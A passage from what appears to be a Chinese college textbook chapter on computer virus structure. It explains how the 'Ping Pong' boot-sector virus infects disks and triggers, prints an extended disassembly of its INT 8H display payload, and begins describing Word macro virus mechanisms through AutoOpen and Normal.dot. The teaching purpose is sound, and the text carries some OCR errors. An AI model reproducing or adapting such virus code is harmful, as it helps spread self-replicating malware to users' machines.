【正文】 07 POP ES 97C0∶ 7D28 1F POP DS 97C0∶ 7D29 EA1A0500C8 JMP C800∶ 051A ；執(zhí)行原 INT 13H 大致過程是：讀入目標磁盤的第一扇區(qū)，并判斷是何種類型磁盤、是否已被小球病毒感染 ( 病毒標志為 1357H)，符合條件時進行感染。首先在 FAT 表中找出一個未用簇，并將它標為壞簇，然后將病毒程序的第二部分寫入該簇第一扇區(qū)，把原磁盤的引導(dǎo)記錄寫入第二扇區(qū)，并把病毒程序的第一部分寫入被感染目標盤的引導(dǎo)扇區(qū)，這就完成了“小球”病毒對一個新磁盤的感染。 淮安信息職業(yè)技術(shù)學(xué)院 24 病毒的表現(xiàn)（破壞）部分 病毒的表現(xiàn)（破壞）模塊及表現(xiàn)（破壞）機制 表現(xiàn) ( 破壞 ) 模塊主要 完成病毒的表現(xiàn)或破壞功能，也可稱為病毒的載體模塊，是計算機病毒的主體模塊。它負責(zé)實施病毒的表現(xiàn) ( 破壞 ) 動作，其內(nèi)部是實現(xiàn)病毒編寫者預(yù)定 計算機病毒的結(jié)構(gòu)及作用機制 破壞動作的代碼，這些破壞動作可能是破壞文件、數(shù)據(jù)，或計算機的空間效率和時間效率 ,使系統(tǒng)的運行變慢，干擾視頻顯示，甚至使機器運行崩潰，這是病毒為了表明自己的存在和達到自己的目的，或早或晚是一定要發(fā)作的。 它的發(fā)作部分應(yīng)具備兩個特征：第一，程序要有一定的隱蔽性及潛伏性，因為病毒的這部分程序是非正常的處理程序，不愿意被人們發(fā)現(xiàn)它的存在；第二，病毒發(fā)作的 條件性和多樣性。無論哪一種計算機病毒，都很少在未進行條件判斷之前隨意發(fā)作，通常只有在符合某種條件以后才發(fā)作。 病毒的觸發(fā)條件大概有以下 5 種： ? 時間、日期作觸發(fā)條件；② 計數(shù)器作觸發(fā)條件；③ 鍵盤字符輸入作觸發(fā)條件； ④ 特定文件出現(xiàn)作觸發(fā)條件；⑤ 綜合觸發(fā)條件，它決定于病毒設(shè)計者的意圖。 計算機病毒的破壞和表現(xiàn)模塊一般分為兩個部分：一個是破壞模塊的觸發(fā)條件的判斷部分；一個是破壞功能的實施部分。觸發(fā)條件的判斷部分時刻監(jiān)視著計算機系統(tǒng)的運行環(huán)境，尋找破壞和表現(xiàn)的時刻；而破壞功能的實施部分經(jīng)常靜止不動，有的病毒 甚至要潛伏一年半載，甚至三五年，視觸發(fā)條件的設(shè)計而定，一旦條件滿足，實施破壞部分被觸發(fā)，才突然發(fā)作。許多潛伏期長的惡性病毒發(fā)作的破壞作用是難以預(yù)計的。 和病毒的感染模塊一樣，破壞模塊可能在病毒程序第一次加載時就運行，也可能在第一次加載時只將引導(dǎo)模塊引入內(nèi)存，以后再通過某些中斷機制觸發(fā)才運第 三 章 計算機病毒的結(jié)構(gòu)和作用機制 25 行。破壞機制在設(shè)計原則上也與感染機制基本相同，也是通過修改某一中斷向量入口地址，使該中斷向量指向病毒程序的破壞模塊。因為病毒表現(xiàn) ( 破壞 ) 模塊的觸發(fā)大都與系統(tǒng)時間有關(guān)，所以病毒常用到的系統(tǒng)中斷，除了病毒傳播利用的INT 13H、 INT 21H 外，還有與系統(tǒng)時間或時鐘有關(guān)的中斷向量，如 INT 1CH( 軟時鐘中斷 ) 、 I NT 8H( 硬時鐘中斷 ) 和 I NT 1AH( 讀取設(shè)定系統(tǒng)時間，日期 ) 等。當(dāng)系統(tǒng)或被加載的程序訪問該被修改過的中斷向量時，病毒的破壞模塊就被激活，在判斷設(shè)定條件滿足的情況下，就開始各種破壞。 表現(xiàn)部分程序舉例 例：“小球”病毒表現(xiàn)部分的程序片段 “小球”病毒的表現(xiàn)模塊包含在感染模塊之中，其觸發(fā)條件為判斷是否半點或整點而且連續(xù)對同一磁盤讀取。執(zhí)行表現(xiàn)模塊的前提也是“ AH= 2”，這一模塊執(zhí)行 時，再進行進一步的條件判別，然后才決定是否實施干擾，其執(zhí)行流程如圖3 .5 所示。 淮安信息職業(yè)技術(shù)學(xué)院 26 下面是“小球”病毒程序的表現(xiàn)模塊程序，由 I NT 8H 所指向 ( 7EBF ～7EDAH 保留 I NT 8H 的原中斷向量，并將 I NT 8H 修改成指向 97C0∶ 7EDFH 病毒程序的顯示部分 ) 。 97C0∶ 7EDF 1E PUSH DS 97C0∶ 7EE0 50 PUSH AX 97C0∶ 7EE1 53 PUSH BX 97C0∶ 7EE2 51 PUSH CX 97C0∶ 7EE3 52 PUSH DX 97C0∶ 7EE4 0E PUSH CS 圖 “小球”病毒表現(xiàn)模塊執(zhí)行流程圖 重畫 第 三 章 計算機病毒的結(jié)構(gòu)和作用機制 27 97C0∶ 7EE5 1F POP DS 97C0∶ 7EE6 B40F MOV AH， 0F；讀當(dāng)前顯示方式 97C0∶ 7EE8 CD10 I NT 10 97C0∶ 7EEA 8AD8 MOV BL， AL；當(dāng)前方式與上次相同 ? 97C0∶ 7EEC 3B1ED47F CMP BX， [ 7FD4] 97C0∶ 7EF0 7435 JZ 7F27 97C0∶ 7EF2 891ED47F MOV [ 7FD4]， BX 97C0∶ 7EF6 FECC DEC AH 97C0∶ 7EF8 8826D67F MOV [ 7FD6]， AH 97C0∶ 7EFC B401 MOV AH， 01 97C0∶ 7EFE 80FB07 CMP BL， 07 97C0∶ 7F01 7502 JNZ 7F05 97C0∶ 7F03 FECC DEC AH 97C0∶ 7F05 80FB04 CMP BL， 04 97C0∶ 7F08 7302 JNB 7F0C 97C0∶ 7F0A FECC DEC AH 97C0∶ 7F0C 8826D37F MOV [ 7FD3]， AH 97C0∶ 7F10 C706CF7F0101MOV WORD PTR[ 7FCF]， 0101 97C0∶ 7F16 C706D17F0101 MOV WORD PTR[ 7FD1]， 0101 97C0∶ 7F1C B403 MOV AH， 03；讀光標位置 97C0∶ 7F1E CD10 I NT 10 97C0∶ 7F20 52 PUSH DX；保存光標位置 97C0∶ 7F21 8B16CF7F MOV DX， [ 7FCF] 97C0∶ 7F25 EB23 JMP 7F4A 淮安信息職業(yè)技術(shù)學(xué)院 28 97C0∶ 7F27 B403 MOV AH， 03 97C0∶ 7F29 CD10 I NT 10 97C0∶ 7F2B 52 PUSH DX 97C0∶ 7F2C B402 MOV AH， 02；光標定位 97C0∶ 7F2E 8B16CF7F MOV DX， [ 7FCF] 97C0∶ 7F32 CD10 I NT 10 97C0∶ 7F34 A1CD7F MOV AX， [ 7FCD] 97C0∶ 7F37 803ED37F01 CMP BYTE PTR [ 7FD3]， 01 97C0∶ 7F3C 7503 JNZ 7F41 97C0∶ 7F3E B80783 MOV AX， 8307；置小球 ASCII 碼及屬性 97C0∶ 7F41 8ADC MOV BL， AH 97C0∶ 7F43 B90100 MOV CX， 0001 97C0∶ 7F46 B409 MOV AH， 09 97C0∶ 7F48 CD10 I NT 10；顯示小球 97C0∶ 7F4A 8B0ED17F MOV CX， [ 7FD1]；調(diào)整小球坐標 97C0∶ 7F4E 80FE00 CMP DH， 00 97C0∶ 7F51 7505 JNZ 7F58 97C0∶ 7F53 80F5FF SOR CH， FF 97C0∶ 7F56 FEC5 I NC CH 97C0∶ 7F58 80FE18 CMP DH， 18 97C0∶ 7F5B 7505 JNZ 7F62 97C0∶ 7F5D 80F5FF XOR CH， FF 97C0∶ 7F60 FEC5 I NC CH 97C0∶ 7F62 80FA00 CMP DL， 00 第 三 章 計算機病毒的結(jié)構(gòu)和作用機制 29 97C0∶ 7F65 7505 JNZ 7F6C 97C0∶ 7F67 80F1FF XOR CL， FF 97C0∶ 7F6A FEC1 I NC CL 97C0∶ 7F6C 3A16D67F CMP DL， [ 7FD6] 97C0∶ 7F70 7505 JNZ 7F77 97C0∶ 7F72 80F1FF XOR CL， FF 97C0∶ 7F75 FEC1 I NC CL 97C0∶ 7F77 3B0ED17F CMP CX， [ 7FD1] 97C0∶ 7F7B 7517 JNZ 7F94 97C0∶ 7F7D A1CD7F MOV AX， [ 7FCD] 97C0∶ 7F80 2407 AND AL， 07 97C0∶ 7F82 3C03 CMP AL， 03 97C0∶ 7F84 7505 JNZ 7F8B 97C0∶ 7F86 80F5FF XOR CH， FF 97C0∶ 7F89 FEC5 I NC CH 97C0∶ 7F8B 3C05 CMP AL， 05 97C0∶ 7F8D 7505 JNZ 7F94 97C0∶ 7F8F 80F1FF XOR CL， FF 97C0∶ 7F92 FEC1 I NC CL 97C0∶ 7F94 02D1 ADD DL， CL 97C0∶ 7F96 02D5 ADD DH， CH 97C0∶ 7F98 890ED17F MOV [ 7FD1]， CX 97C0∶ 7F9C 8916CF7F MOV [ 7FCF]， DX 97C0∶ 7FA0 B402 MOV AH， 02；光標定位 淮安信息職業(yè)技術(shù)學(xué)院 30 97C0∶ 7FA2 CD10 I NT 10 97C0∶ 7FA4 B408 MOV AH， 08 97C0∶ 7FA6 CD10 I NT 10；讀當(dāng)前光標處字符和屬性 97C0∶ 7FA8 A3CD7F MOV [ 7FCD]， AX 97C0∶ 7FAB 8ADC MOV BL， AH 97C0∶ 7FAD 803ED37F01 CMP BYTE PTR [ 7FD3]， 01 97C0∶ 7FB2 7502 JNZ 7FB6 97C0∶ 7FB4 B383 MOV BL， 83 97C0∶ 7FB6 B90100 MOV CX， 0001 97C0∶ 7FB9 B80709 MOV AX， 0907；置小球字符 97C0∶ 7FBC CD10 I NT 10；顯示小球 97C0∶ 7FBE 5A POP DX 97C0∶ 7FBF B402 MOV AH， 02；恢復(fù)光標位置 97C0∶ 7FC1 CD10 I NT 10 97C0∶ 7FC3 5A POP DX 97C0∶ 7FC4 59 POP CX 97C0∶ 7FC5 5B POP BX 97C0∶ 7FC6 58 POP AX 97C0∶ 7FC7 1F POP DS 97C0∶ 7FC8 EA2C027000 JMP F000∶ FEA5；執(zhí)行原 INT 8H 將小球病毒的引導(dǎo)部分、感染部分、表現(xiàn)部分合在一起，就是“小球”病毒的程序。 第 三 章 計算機病毒的結(jié)構(gòu)和作用機制 31 宏病毒的運行機制 下面以 word宏病毒為例來介紹宏病毒的運行機制： 微軟的 Word 中所生成的 .doc 文件是一個代碼和數(shù)據(jù)的綜合體。因為雖然這些代碼不能直接運行 , 但是可以由 Word 進行解釋來執(zhí)行操作 , 因此結(jié)果是一樣的。 Word 的文件建立是通過模板來創(chuàng)立的。模板是為了形成最終文檔而提供的特殊文檔 , 可以包括以下幾個元素 ： 菜單、宏、格式。模板是文本、圖形和格式編排的藍 圖 , 對于某一類型的所有文檔來說 , 文本、圖像和格式的編排都是類似的。 Word 提供了幾種常見文檔類型的模板 , 使用者可以直接使用模板來創(chuàng)建新文檔 , 或者加以修改 , 也可以創(chuàng)建自己的模板。一般情況下 , Word 自動將新文檔基于缺省的公用模板 , 也就是說模板在建立整個文檔中是作為基礎(chǔ)的 , 文檔繼承模板的屬性 , 包括宏、菜單、格式等。 在用 Word 處理文檔時 , 需要同時進行各種不同的動作 , 每一種動作其實都對應(yīng)著特定的宏命令。當(dāng)建立一個文檔時 , 系統(tǒng)首先打開一個通用模板文件 , 如Normal .dot 等 ( 可由用戶選擇 ) , 其中存放了一些新文檔的初始化宏程序。建立新文檔所對應(yīng)的是 FileNew宏 。 當(dāng)打開一個文檔時 , 首先執(zhí)行 OpenFile 宏 , 將該文檔打開 , 再根據(jù)該文檔所對應(yīng)的模板執(zhí)行 AutoOpen 宏。 Word 在打開文件時 , 它首先要檢查是否有 AutoOpen 宏存在 , 假如有 ,Word 就會自動地啟動它 , 除非在此前系統(tǒng)已經(jīng)被“取消宏”命令設(shè)置成宏命令無效 。 如果 AutoClose 宏存在 , 則系統(tǒng)在關(guān)閉一個文件時 , 就會自動執(zhí)行它?？偠灾?, 在處理文檔時 ,Word 總要進行某些宏的操作 , 如 ： 打開、關(guān)閉、存儲、打印等 , 同時 ,Word 為了進行上述操作 , 必須執(zhí)行模板上有標準名稱的宏程序。 宏病毒的感染過程和破壞行為與 Word 的文件宏程序的操作密切相關(guān) , 這些宏程序可能就是宏病毒的插入點。病毒包含在宏中時 , 只要染毒的文檔被打開 , 淮安信息職業(yè)技術(shù)學(xué)院 32 病毒的宏程序就可能會被執(zhí)行 , 進而取得系統(tǒng)控制權(quán) , 進行感染或破壞。 為了能廣泛地傳播 , 宏病毒大都采用感染通用模板 Normal .dot 的方法將自己復(fù)制到其他文檔中去。 Word